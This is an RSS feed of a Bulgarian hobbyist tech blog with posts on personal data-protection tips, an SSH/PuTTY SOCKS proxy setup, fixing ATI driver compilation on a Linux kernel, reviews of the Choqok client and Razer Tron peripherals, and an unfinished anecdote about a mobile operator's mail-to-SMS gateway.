<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Lucifer&#039;s sandbox &#187; geek time</title>
	<atom:link href="http://www.anavaro.com/blog/tag/geek-time/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.anavaro.com/blog</link>
	<description>Where the devil plays</description>
	<lastBuildDate>Sun, 29 Jan 2012 18:43:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Защита на данните &#8230; или как да си вържем гащите.</title>
		<link>http://www.anavaro.com/blog/zashtita-na-dannite/</link>
		<comments>http://www.anavaro.com/blog/zashtita-na-dannite/#comments</comments>
		<pubDate>Sat, 15 Oct 2011 13:55:10 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[geek time]]></category>
		<category><![CDATA[HowTo]]></category>
		<category><![CDATA[misk]]></category>
		<category><![CDATA[PC]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[информация]]></category>
		<category><![CDATA[параноя]]></category>
		<category><![CDATA[сигурност]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=746</guid>
		<description><![CDATA[На една събиране на любимия ми форум се роди идеята да се напише ръководство за защита на информацията. Поради спецификата на форума и поради това, че аз най съм страдал от чужда не защитена информация (нечии бащи са си купували бойни патрони заради мен, майки много усилено са искали да ме разберат кой съм) ме [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.anavaro.com/blog/wp-content/uploads/2011/10/china-internet-addi1.jpg"><img class="alignleft size-full wp-image-1462" style="margin: 5px;" title="china-internet-addi1" src="http://www.anavaro.com/blog/wp-content/uploads/2011/10/china-internet-addi1.jpg" alt="" width="330" height="282" /></a>На една събиране на любимия ми форум се роди идеята да се напише ръководство за защита на информацията. Поради спецификата на форума и поради това, че аз най съм страдал от чужда не защитена информация (нечии бащи са си купували бойни патрони заради мен, майки много усилено са искали да ме разберат кой съм) ме натовариха с отговорността да го направя.</p>
<h3>Да започнем с няколко лесни постановки:</h3>
<h4>1. Забравете IE.</h4>
<p>Да. Знам, че много хора го използват, но това  не  е добра идея. Свалете си Firefox или Chrome или Opera (аз това съм ползвал и с това мога да ви дам съвети). Всеки от тези browser-и има едно малко предимство &#8211; &#8220;Анонимно сърфиране&#8221; (в FF) или &#8220;Инкогнито&#8221; (в Chrome), не знам как е в Opera, но и там знам, че има такова.</p>
<h4>2. Поща.</h4>
<p>Имам позната, която така си прави регистрациите, че никой не може да свърже името и с ника и. Регистрирала си е две пощи и ги използва за различни цели. Това не е лоша идея.</p>
<h4>3. Лично пространство.</h4>
<p>Макар вие да спазвате личното пространство на хората, които ползват вашия компютър, някой може и да не го прави, за това много внимавайте със снимките и като цяло информацията, която държите там. За предпочитане е да не държите нищо което могат да използват срещу вас или което може да навреди на някой. Лично при мен всички компромати са добре защитени или на криптирани дискове, или в криптирани контейнери от рода на обяснените по-късно.</p>
<h4>4. Използвайте антивирусната и firewall-а както трябва</h4>
<p>Една добре update-вана антивирусна и един добре конфигуриран firewall могат да ви спестят много проблеми.</p>
<h4>5. Проверявайте работещия на машината software</h4>
<p>Добре е да си пускате от време на време TaskManager-а или по добре да си сложите ProcessExplorer от Sysinternals пакета. Може да ви звучи на китайски, но скоро ще се научите кое не трябва да спирате и кое трябва.</p>
<h4>6. Нямайте доверие никому!</h4>
<p>Това е може би най-важната точка. Не позволявайте други хора да работят във вашия акаунт или с административни права на вашия компютър! Ако трябва да седнат им създайте един ограничен Guest акаунт и да се забавляват!</p>
<p>Това са основните правила, които трябва да спазвате. Има други, които ще подобрят нещата, но целта на този материал е да ви предпази от основните проблеми.</p>
<h3>А сега да преминем към частта за напреднали (леко параноични).</h3>
<p>Или както обичам да казвам: Елате приятели параноици!</p>
<h4>1. Portable приложения.</h4>
<p>Каква е идеята? Имате приложение/програма, която работи в така наречения sandbox или пясъчник &#8211; среда която е практически заделена само за това приложение и всичко което прави, го прави в пясъчника. Всички временни файлове, история, бисквитки, всичко &#8211; се пази в sandbox-a на програмата.</p>
<p>Пълен набор такива неща можете да намерите на www.portableapps.com</p>
<h4>2. Криптиране</h4>
<p>Помните ли старите програмки за заключване на папки? Е, това е малко по-добро &#8211; използвайки последните достижения на информатиката можете да направите непрочетими, заключени с парола части от работната си среда. Папки, флашки, дори цели дискове на компютри. Всичко.</p>
<h4>3. Криптирани дискове + Potable Приложения</h4>
<p>Какво ли общо могат да имат двете неща по-горе? Преносими приложения и криптиране &#8230;</p>
<p>Нека ви дам пример: Криптиран фаил, на флашка, пълен с пълния набор инструменти, програми, пароли и изобщо всичко което ви трябва за работа &#8230;</p>
<p>Как ли става?</p>
<p>Лесно.</p>
<p>(тук ще покрия работата с и създаването на тази среда само за Windows (ако сте стигнали до работа с Linux, сигурно знаете хитринки достатъчно за да се опазите))</p>
<h5>Стъпка 1.</h5>
<p>Сваляме FreeOTFE или FreeOTFE Explorer &#8211; и двете ги има в portable версия. (<a href="http://www.freeotfe.org/download.html" target="_blank">цък</a>) и си създаваме криптиран контейнер с необходимата големина и силна парола. За това, ако желаете ще напиша отделно ръководство.</p>
<h5>Стъпка 2.</h5>
<p>Сваляме си необходимите програми. Skype. Firefox. Thunderbird &#8230; Каквото ви трябва &#8230; и си ги слагате във вече създадения контейнер.</p>
<h5>Стъпка 3.</h5>
<p>Слагате си контейнера и програмата за декриптиране (FreeOTFE или FreeOTFE Explorer) на една флашка или преносим диск и си ползвате тях. По този начин имате едно малко, виртуално швейцарско ножче, което от вън не изглежда на нищо.</p>
<h4>4. Друга опция ( за много напреднали или много параноични)</h4>
<p>Макар този начин да ви гарантира, че няма да оставите почти никакви следи, не е изключено системата на която сте да има закачени разни малки бубички, като keylogger-и, програми за снимане на десктопа и какви ли не още екстри. За да се предпазите от тези неща има един сигурен начин и това е операционна система на флашка и то само ако имате начин да накарате компютъра да стартира от нея. Има няколко готови Linux базирани проекти, които се инсталират лесно и не се различават чак толкова от средата с която сте свикнали да работите. Аз лично предпочитам <a href="http://www.slax.org/">Slax</a>, но това е само защото съм гаден върл фен на Slackware.</p>
<p>В някой от следващите дни ще седна да напиша ръководство за използването на FreeOTFE и за създаването на Live дистрибуция, която да носите в джоба си.</p>
<p>Надявам се да съм ви бил полезен.</p>
<p>Ваш,</p>
<p>Lucifer</p>
]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/zashtita-na-dannite/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Choqok &#8230; Минималистичният twitter клиент за Linux (Geek Time)</title>
		<link>http://www.anavaro.com/blog/geek-time-choqok/</link>
		<comments>http://www.anavaro.com/blog/geek-time-choqok/#comments</comments>
		<pubDate>Wed, 20 Jul 2011 06:00:59 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[blog]]></category>
		<category><![CDATA[geek time]]></category>
		<category><![CDATA[choqok]]></category>
		<category><![CDATA[software]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=1355</guid>
		<description><![CDATA[Днес съм решил да ви занимая с една приятна програма, която използвам много или малко всеки ден. Един от най-големите ми проблеми при миграцията към Linux преди малко повече от две години (леле станаха ли толкова?) беше да си намеря правилните клиенти за услугите които ползвах и което е по-важно &#8211; да харесвам клиентите. Koppete [...]]]></description>
			<content:encoded><![CDATA[<p>Днес съм решил да ви занимая с една приятна програма, която използвам много или малко всеки ден.</p>
<p>Един от най-големите ми проблеми при миграцията към Linux преди малко повече от две години (леле станаха ли толкова?) беше да си намеря правилните клиенти за услугите които ползвах и което е по-важно &#8211; да харесвам клиентите.</p>
<p>Koppete пасна идеално на ICQ, Facebook и GTalk.</p>
<p>Pidgin за XMPP Server-а, който поддържам.</p>
<p><a href="http://www.anavaro.com/blog/wp-content/uploads/2011/07/choqok_public.jpeg"><img class="size-full wp-image-1356 alignright" style="margin: 5px;" title="choqok_public" src="http://www.anavaro.com/blog/wp-content/uploads/2011/07/choqok_public.jpeg" alt="" width="342" height="533" /></a>Но намирането на правилния twitter клиент за под Linux беше трудно &#8230; докато не попаднах случайно на едно малко бижу наречено Choqok. Използвам го от версия 0.7 (последната версия е 1.1) и съм изключително доволен. Като цяло целта му е да е лек и удобен клиент за microblogging мрежи. Написан е е на QT (поне по-старите версии, сега видях че минават на GTK+), което означава, че приема общия вид и изглед на темата ви. Аз лично винаги съм си падал по минималистичният дизайн и за може би за това тази скромна на вид програмка ме грабна и се превърна в част от &#8220;задължителния софтуер&#8221;.</p>
<p>Това което предлага Choqok е основните и най-необходими функции за нормално използване на Twitter или повечето от micro-bloging мрежите за които предоставя функционалност:</p>
<ul>
<li>множество accounts в множество micro-blog мрежи (Twitter, identi.ca и др.)</li>
<li>съкращаване на URL-и</li>
<li>различни timelines &#8211; Приятели, @Спомеанвания, Inbox, Outbox</li>
<li>oфициалния twitter ReTweet</li>
<li>Upload на снимки в различни услуги</li>
<li>интеграция с KWallet за запазване на паролите</li>
<li>нотификация за получени tweet-ове</li>
<li>глобални клавишни комбинации &#8230;</li>
</ul>
<p>Като цяло програмката е идеалния клиент за хора харесващи минималистичния дизайн &#8211; целта е да е twitter клиент и си я изпълнява с пълна сила, без да bloat-ва с различни шарении или ненужни функции.</p>
<p>Ако, като мен, сте привързани към опростения вид или просто искате чисто функционален software &#8211; Choqok е точно за вас.</p>
<p>И след цялото това представяне, можете да намерите самата програма <a href="http://choqok.gnufolks.org/" target="_blank">тук</a>.</p>
<p>Choqok е FOSS (Free/Open Source Software), разпространяваща се под GNU GPL v.3 лиценз.</p>
<p>Надявам се да съм ви бил полезен.</p>
<p>&nbsp;</p>
<p>Ваш,</p>
<p>Lucifer</p>
]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/geek-time-choqok/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Razer Tron &#8230; за маниаци (GeekTime)</title>
		<link>http://www.anavaro.com/blog/geek-time-razer-tron/</link>
		<comments>http://www.anavaro.com/blog/geek-time-razer-tron/#comments</comments>
		<pubDate>Wed, 13 Jul 2011 06:00:11 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[blog]]></category>
		<category><![CDATA[geek time]]></category>
		<category><![CDATA[PC]]></category>
		<category><![CDATA[razer]]></category>
		<category><![CDATA[review]]></category>
		<category><![CDATA[tron]]></category>
		<category><![CDATA[периферия]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=1329</guid>
		<description><![CDATA[Това смятам да е първия пост, от една надявам се дълга поредица. Имам намерение всяка сряда да пиша за собствения си досег с нещо &#8230; geek-ско. Било то телефони, софтуер, хардуер или каквото ми дойде на ум &#8230; Май ми стана навик да тествам разни много маниашки неща. Както споменах в статията за Marauder-a Васи [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>Това смятам да е първия пост, от една надявам се дълга поредица. Имам намерение всяка сряда да пиша за собствения си досег с нещо &#8230; geek-ско. Било то телефони, софтуер, хардуер или каквото ми дойде на ум &#8230;</p></blockquote>
<p>Май ми стана навик да тествам разни много маниашки неща.</p>
<p>Както споменах в статията за Marauder-a Васи ми даде няколко неща за проба. Освен Мародера, за да го видя как работи под Linux, получих и Razer Tron комплект, за да мога да се изкефя максимално &#8230;</p>
<p>Честно казано останах малко разочарован от комплекта на Tron. И мишката и клавиатурата са предназначени за маниаци на тема филма и играта, а аз както можете да се сетите не съм съвсем голям маниак, за това и оценката ми е по-скоро функционална от колкото нещо друго &#8230;</p>
<p>Но нека ги разгледаме по отделно.</p>
<h3>Мишка Razer Tron с MousePad Tron</h3>
<p><a href="http://www.anavaro.com/blog/wp-content/uploads/2011/07/tron-mousemat.jpg"><img class="alignleft size-full wp-image-1338" style="margin: 5px;" title="tron-mousemat" src="http://www.anavaro.com/blog/wp-content/uploads/2011/07/tron-mousemat.jpg" alt="" width="400" height="294" /></a>Първото нещо, което прави впечатление при докосването до комплекта е &#8230; опаковката! Самата опаковка е супер яка &#8211; оставаш с чувството, че мишката не трябва да се пипа, а само да се гледа в кутията &#8230; истинска красотичка. При отваряне на кутията, ракцията ми беше - УОУ! Като я пъхнеш в USB порта и светва, че и &#8220;зарежда&#8221; &#8211; чува се звук като от отваряне на LightCycle от филма. Дори самата мишка има форма на заветните моторчета. След първото &#8220;УОУ&#8221;! обаче, се заиграх със самата мишка. Мишката е много бърза (предполагам, че заради високото DPI (и да знам, че има настройки за скорост)) и в същия момент изключително лека. Самият аз съм свикнал мишката ми да се чувства в ръката ми, да тежи едни 100-150 гр. Самият аз използвам лазерна, безжична мишка, която има ергономична форма и много удобно приляга в ръката, и тежи достатъчно за да дава прецизност на движенията. Трон плъхчето, от своя страна е изключително леко, но си мисля, че това си е по-скоро въпрос на предпочитания. Също така и самият корпус не ми приляга толкова удобно колкото ми се иска &#8230;</p>
<p>Истинския eyecandy идва обаче, като сложиш мишката на подложката и намалиш светлината &#8230; МИШКАТА ОСТАВЯ СВЕТЛИННИ ДИРИ! Супер яко! (жалко, че имам предпочитание към по скромните дизайни). Поиграх си достатъчно с мишката, за да мога да ви кажа, че е супер красива.</p>
<p>Тук сигурно очаквате да ви обрисувам какви невероятни функции има самата мишка (като например промяна на цвета при някакво действие в играта, програмируеми бутони и тн), но за мое най-искрено съжаление продуктите на Razer нямат драйвери за Linux, за това и не успях да ги пробвам напълно, както ми се искаше &#8230;</p>
<h5>Плюсове:</h5>
<ul>
<li>Супер фенски дизайн</li>
<li>Настройка на почти всичко което се сетите за мишката ((800, 1200, 1800, 4000 и 5600 DPI), sensetivity и тн.)(под Windows)</li>
<li>Feedback</li>
<li>EYECANDY!!! &#8211; оставяната светлинна диря е много яка!</li>
</ul>
<h5>Минуси (поне според мен):</h5>
<ul>
<li>Липса на Linux драйвери</li>
<li>Лекотата на самата мишка</li>
<li>Дизайн на корпуса, който не е един от най-ергономичните</li>
</ul>
<h3>Клавиатурата Razer Tron</h3>
<p><a href="http://www.anavaro.com/blog/wp-content/uploads/2011/07/tron_keyboard.jpg"><img class="alignright size-full wp-image-1339" style="margin: 5px;" title="tron_keyboard" src="http://www.anavaro.com/blog/wp-content/uploads/2011/07/tron_keyboard.jpg" alt="" width="405" height="222" /></a>И за клавиатурата на Razer Tron, както и за мишката, първото което те грабва е опаковката! И тя, като плъхчето е опакована, за да бъде гледана. Самата клавиатура си е eyecandy от всякъде &#8230; сининички ленти навяват мисли за шеметни скорости &#8230; Едно хитро нещо, което прави впечатление е, че numpad частта е свободна и може да си я сложите от която страна си искате, което си е много много хитро. Самата клавиатура, както и мишката си имат подсветки, които им придават един чисто &#8230; Tron вид &#8230; И тя, на гледане обира точките &#8230; Изходи за слушалки и микрофон на самата клавиатура &#8230; абе красотичка &#8230;</p>
<p>И тук идва голямото &#8220;НО&#8221; &#8211; самата клавиатура е неудобна. Клавишите са раздалечени и много повече наподобяват копчета на терминал. Предполагам, че това е търсен ефект, но според мен са се престарали &#8211; самите клавиши се натискат и се усещат под пръстите като копчета. Писането е, меко казано, непривично, да не кажа, че е направо неудобно. Освен това са несвойски поставени &#8230; Аз съм човек с навици и сигурно, ако работя 3-4 дни на тази клавиатура ще свикна, но в един момент (след поредното &#8220;А&#8221; вместо &#8220;С&#8221; или &#8220;Caps Lock&#8221; вместо &#8220;Я&#8221;) предпочетох да се върна на клавиатурата на лаптопа. Същия ефект имаше и върху играта ми &#8211; използвах Trine, много приятен jump&#8217;n'run от Frost Bite bundle-то, но просто не успях да се справя с раздалечените клавиши и лекотата на мишката &#8230;</p>
<h5>Плюсове:</h5>
<ul>
<li>Фенски дизайн</li>
<li>Сменям numpad</li>
<li>Аудио IN и OUT на самата клавиатура</li>
<li>Eyecandy</li>
<li>Макроси (които не успях да пробвам поради Linux-a)</li>
</ul>
<h5>Моите лични минуси:</h5>
<ul>
<li>Клавиши, които се усещат като бутони</li>
<li>&#8220;Дизайнерско&#8221; разположение на клавишите</li>
</ul>
<p>&nbsp;</p>
<h3>За накрая:</h3>
<p>Дали бих си ги купил?</p>
<p>За мен лично &#8211; Не. Не мога да си представя да работя ежедневно на тях. Въпреки, че са фенски, аз имам нужда от функционалност.</p>
<p>Честно обаче са идеален подарък за всеки ваш приятел, който си умира за филмите или играта.</p>
<p>Надявам се лични ми досег с Razer Tron комплекта да ви е харесал, защото за мен беше нещо &#8230; специално &#8230;</p>
<p>&nbsp;</p>
<p>Ваш,</p>
<p>Lucifer</p>
]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/geek-time-razer-tron/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SOCKS 5 + PuTTY + SSH или лесен псевдо VPN(GeekTime)</title>
		<link>http://www.anavaro.com/blog/socks5-putty-ssh-easy-vpn/</link>
		<comments>http://www.anavaro.com/blog/socks5-putty-ssh-easy-vpn/#comments</comments>
		<pubDate>Thu, 22 Apr 2010 09:47:33 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[geek time]]></category>
		<category><![CDATA[HowTo]]></category>
		<category><![CDATA[chrome]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[putty]]></category>
		<category><![CDATA[socks 5]]></category>
		<category><![CDATA[vpn]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=609</guid>
		<description><![CDATA[Днес сутринта на работа реших, че ми трябва достъп до сайт &#8230; който не е добре да разбират от работа, че гледам и реших да се заинтересувам от възможноста за създаване на някакво псевдо proxy и попаднах на този супер лесен начин. Какво ви трябва? PuTTY SSH Shell някъде Хубав browser (Firefox/Chrome/Opera) Каква е целта? [...]]]></description>
			<content:encoded><![CDATA[<p>Днес сутринта на работа реших, че ми трябва достъп до сайт &#8230; който не е добре да разбират от работа, че гледам и реших да се заинтересувам от възможноста за създаване на някакво псевдо proxy и попаднах на този супер лесен начин.</p>
<p>Какво ви трябва?</p>
<p>PuTTY</p>
<p>SSH Shell някъде</p>
<p>Хубав browser (Firefox/Chrome/Opera)</p>
<p><br class="spacer_" /></p>
<p>Каква е целта?</p>
<p>Използвайки една малко известна функция на SSH създаваме връзка с shell-а, който може да е на всякъде (в моя случай &#8211; www.anavaro.com). После пренасочваме трафика през връзката и получаваме своебразен лесен VPN.</p>
<p><br class="spacer_" /></p>
<p>Как става?</p>
<p>Пускате PuTTY.</p>
<p>Задавате адрес за SSH сесията.</p>
<p>Отивате на Connections -&gt; SSH -&gt; Tunels.</p>
<p>Задавате Source port (в моя случай 8888)</p>
<p>Слагате отметките под Destination на Dynamic и Auto и давате Add</p>
<p>Свързвате се с shell-а, пишете си user-а и паролата</p>
<p>И вече имате тунел през който да пренасочите трафика си.</p>
<p>Сега тънката част &#8211; Browser-а</p>
<p>Тук ще спомена, че по принцип всеки Browser може да се използва, всеки който има възможности да ползва proxy. Защо споменах горните 3 ще разберете по-късно.</p>
<p>За Firefox:</p>
<p>Tools -&gt; Options -&gt; Advanced -&gt; Network -&gt; Settings</p>
<p>Там избирате Manual Proxy Configuration и в SOCKS Host слагате 127.0.0.1, а за порт &#8211; порта който сте си избрали по рано.</p>
<p>От тук на сетне целия трафик ще минава през отворената с PuTTY сесия &#8230;</p>
<p>Тук идва въпроса &#8211; АМИ DNS ЗАЯВКИТЕ? Защото той трафика си минава през secure връзката, но сайтовете се резолвват през DNS.</p>
<p>В адресната линия пишете &#8220;about:config&#8221;. Намирате си опцията &#8220;etwork.proxy.socks_remote_dns&#8221; и я правите на TRUE et voila &#8230;</p>
<p>За Chrome:</p>
<p>Отново като за Firefox сменяте proxy-то, но слагането на secure DNS е малко по-сложно:</p>
<p>1. Добавяте към shortcut-а на Chrome</p>
<pre>--proxy-server=socks5://127.0.0.1:8888</pre>
<p>2. от настройките отивате на Under the hood и махате опцията &#8220;Use DNS pre-fetching to improve page load performance&#8221;</p>
<p>и готово! Имате си secure връзка.</p>
<p>А какво правите, ако сте като мен &#8211; под Linux?</p>
<p>Дори още по-лесно:</p>
<p>В някоя конзола пускате следния ред:</p>
<pre>$ ssh -D 8888 user@host</pre>
<p>И правите същите настройки на browser-а като за Windows &#8230;</p>
<p>Това SOCKS5 Proxy може да използвате и с повеето чат клиенти, за да си прекарате връзката през него (Skype и Koppete знам със сигурност, че имат proxy options)</p>
<p>Надявам се това да ви е помогнало!</p>
<p>Ваш,</p>
<p>Lucifer</p>
]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/socks5-putty-ssh-easy-vpn/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Kernel 2.6.32.x и ATI Catalyst (GeekTime)</title>
		<link>http://www.anavaro.com/blog/kernel-2-6-32-x-ati-catalyst/</link>
		<comments>http://www.anavaro.com/blog/kernel-2-6-32-x-ati-catalyst/#comments</comments>
		<pubDate>Mon, 11 Jan 2010 17:35:22 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[geek time]]></category>
		<category><![CDATA[HowTo]]></category>
		<category><![CDATA[2.6.32.3]]></category>
		<category><![CDATA[ati catalyst]]></category>
		<category><![CDATA[drivers]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[slackware]]></category>
		<category><![CDATA[драйвери]]></category>
		<category><![CDATA[кернел]]></category>
		<category><![CDATA[линукс]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=528</guid>
		<description><![CDATA[Нали ме знаете, че съм си гаден geek, та винаги гледам да съм с последните версии на каквото е излязло &#8230; дори с последни версии на ядрото на Slackware-а с който работя в къщи. Kernel-а който излезе на 9-ти беше 2.6.32.3 и разбира се първата ми работа беше да го инсталирам, да го прекомплирам за [...]]]></description>
			<content:encoded><![CDATA[<p>Нали ме знаете, че съм си гаден geek, та винаги гледам да съм с последните версии на каквото е излязло &#8230; дори с последни версии на ядрото на Slackware-а с който работя в къщи.</p>
<p>Kernel-а който излезе на 9-ти беше 2.6.32.3 и разбира се първата ми работа беше да го инсталирам, да го прекомплирам за да открива и 4-те GB RAM и да си направя initrd.gz за да мога да си пускам машината (аз съм гаден параноик и съм я криптирал)  &#8230;</p>
<p>Всичко мина добре. Влязох като root и махнах стария fglrx.9.12 компилиран за 2.6.29.6.</p>
<p>Стартирах инсталатора &#8230; и каква беше изненадата ми, когато вместо &#8220;Instalation complete&#8221;, получих съобщението &#8220;There were errors compiling driver. Please refer to fglrx-install.log&#8221;</p>
<p>WTF??? Какви грешки бе!</p>
<p>nano /usr/share/ati/fglrx-install.log</p>
<pre>[Message] Kernel Module : Trying to install a precompiled kernel module.
[Message] Kernel Module : Precompiled kernel module version mismatched.
[Message] Kernel Module : Found kernel module build environment, generating kernel module now.
AMD kernel module generator version 2.1
doing Makefile based build for kernel 2.6.x and higher
rm -rf *.c *.h *.o *.ko *.GCC* .??* *.symvers
make -C /lib/modules/2.6.32.3-smp/build SUBDIRS=/lib/modules/fglrx/build_mod/2.6.x modules
make[1]: Entering directory `/usr/src/linux-2.6.32.3'
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/firegl_public.o
In file included from /lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:443:
/lib/modules/fglrx/build_mod/2.6.x/drm_proc.h: In function ‘FGLDRM__vma_info’:
/lib/modules/fglrx/build_mod/2.6.x/drm_proc.h:497: warning: format ‘%08lx’ expects type ‘long unsigned int’, but argument 5 has type ‘phys_addr_t’
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c: In function ‘KCL_MapPageToPfn’:
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:1586: warning: unused variable ‘bus_addr’
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_acpi.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_agp.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_debug.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_ioctl.o
CC [M]  /lib/modules/fglrx/build_mod/2.6.x/kcl_io.o
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c: In function ‘KCL_IO_FASYNC_Terminate’:
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: ‘SIGIO’ undeclared (first use in this function)
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: (Each undeclared identifier is reported only once
/lib/modules/fglrx/build_mod/2.6.x/kcl_io.c:122: error: for each function it appears in.)
make[2]: *** [/lib/modules/fglrx/build_mod/2.6.x/kcl_io.o] Error 1
make[1]: *** [_module_/lib/modules/fglrx/build_mod/2.6.x] Error 2
make[1]: Leaving directory `/usr/src/linux-2.6.32.3'
make: *** [kmod_build] Error 2
build failed with return value 2
[Error] Kernel Module : Failed to compile kernel module - please consult readme.
</pre>
<p>Какво по &#8230;</p>
<p>И отново старото ровене в чичо google &#8230; 2 дни без хубаво видео &#8230; няма да ви описвам мъките си &#8230; докато на някакъв забит пост в някакъв забит форум не намерих как да го оправя &#8230; а то се оказа и много просто &#8211; явно в новата ядро са отделили част от нещата в нов header file &#8230;</p>
<p>Ето и решението step-by-step:</p>
<p>01. Сваляте си драйверите от сайта на ATI.<br />
 02. Стартирате run-а с опция &#8211;extract<br />
 03. Отваряте fglrx-install.nqkakuv_string/common/lib/modules/fglrx/build_mod/kcl_io.c където добавяте:</p>
<p>#include &lt;linux/signal.h&gt;</p>
<p>04. В fglrx-install.nqkakuv-string стартирате sh ./ati-installer.sh 8.5912 &#8211;install<br />
 05. reboot &#8230; and that is all &#8230;</p>
<p>Лесно нали? Някъде из нет-а се мотат готови .patch, но нямах време и желание да търся &#8230; за това използвах nano &#8230; и го направих на ръка &#8230; лесно и бързо &#8230; веднъж като знаеш какво ти трябва &#8230;</p>
<p>Надвявам, се да помогна на някого.</p>
<p><br class="spacer_" /></p>
<p>Ваш,</p>
<p>Lucifer</p>
]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/kernel-2-6-32-x-ati-catalyst/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Vivacom &#8230; малко забава &#8230;</title>
		<link>http://www.anavaro.com/blog/vivacom-malko-zabava/</link>
		<comments>http://www.anavaro.com/blog/vivacom-malko-zabava/#comments</comments>
		<pubDate>Sat, 26 Dec 2009 19:14:08 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[fun]]></category>
		<category><![CDATA[geek time]]></category>
		<category><![CDATA[misk]]></category>
		<category><![CDATA[joke]]></category>
		<category><![CDATA[mail2sms]]></category>
		<category><![CDATA[support]]></category>
		<category><![CDATA[vivakom]]></category>
		<category><![CDATA[виваком]]></category>
		<category><![CDATA[поддръжка]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=516</guid>
		<description><![CDATA[Седя си аз и си обмислям поредния проект, много важна част от който е изпращането на e-mail към SMS и който ще публикувам като го завърша &#8230; та решавам аз да видя дали Жижакомци (как звучи обаче) поддържат mail2sms &#8230; Звъня аз на оператор &#8230; Операторката: Виваком. Говорите с &#8230; АЗ(след 5 минути on hold): [...]]]></description>
			<content:encoded><![CDATA[<p>Седя си аз и си обмислям поредния проект, много важна част от който е изпращането на e-mail към SMS и който ще публикувам като го завърша &#8230; та решавам аз да видя дали Жижакомци (как звучи обаче) поддържат mail2sms &#8230;</p>
<p><br class="spacer_" /></p>
<p>Звъня аз на оператор &#8230;</p>
<p>Операторката: Виваком. Говорите с &#8230;</p>
<p>АЗ(след 5 минути on hold): Добър вечер. Имам глупав въпрос. Случайно да поддържате e-mail към SMS услигата?</p>
<p>Девойката: Аааа. &#8230; не знам &#8230; изчакайте за момент на линия да попитам.</p>
<p>(пратен съм пак on hold)</p>
<p>Девойката: Не господине, не предлагаме тази услуга.</p>
<p>АЗ: Добре, а има ли някакъв начин да пращам SMS от интернет?</p>
<p>Девойката: Да, господине &#8230; от сайта на Виваком.</p>
<p>АЗ: А има ли някакво API или нещо което да автоматизира процеса?</p>
<p>Девойката: Моля? Не ви разбрах?</p>
<p>(Свикнал съм да не ме разбират)</p>
<p>АЗ: Добре. Няма значение, благодаря ви.</p>
<p>***</p>
<p>Тази ситуация, както се досещате никак не ми харесва &#8230; ама никак! Та решавам въпреки това да пробвам.</p>
<p>Преравям интернета и виждам как са дефинирани адресите на другите 2 Български мобилни оператора &#8230;</p>
<p>Логвам се в мейл-а си.</p>
<p>359878хххххх[at]sms.vivacom.bg</p>
<p>Пращам &#8230;</p>
<p>Звънн на GSM-а -&gt; ИМАТЕ SMS от &#8230;</p>
<p>DEAMN YOU!!!</p>
<p>Звъня пак на оператор &#8230;</p>
<p>***</p>
<p>Девойката: Свързахте се с Виваком. Говорите с &#8230;</p>
<p>АЗ: Добър вечер. Я да ви питам &#8211; заплащам ли SMS-ите, които получавам от mail2sms gatway-а ви?</p>
<p>Девойката: А? Не ви разбрах?</p>
<p>АЗ: Заплащам ли SMS-ите които получавам от електронната си поща?</p>
<p>Девойката: Имате предвид новата ни услуга Nokia Messeging ли?</p>
<p>АЗ: Не. Нямам предвид push mail услугата ви&#8230; Имам предвид mail2sms gateway-a &#8230; Няма значение &#8230; Бихте ли ми казали дали заплащам SMS-те пристигащи от номер &#8230;</p>
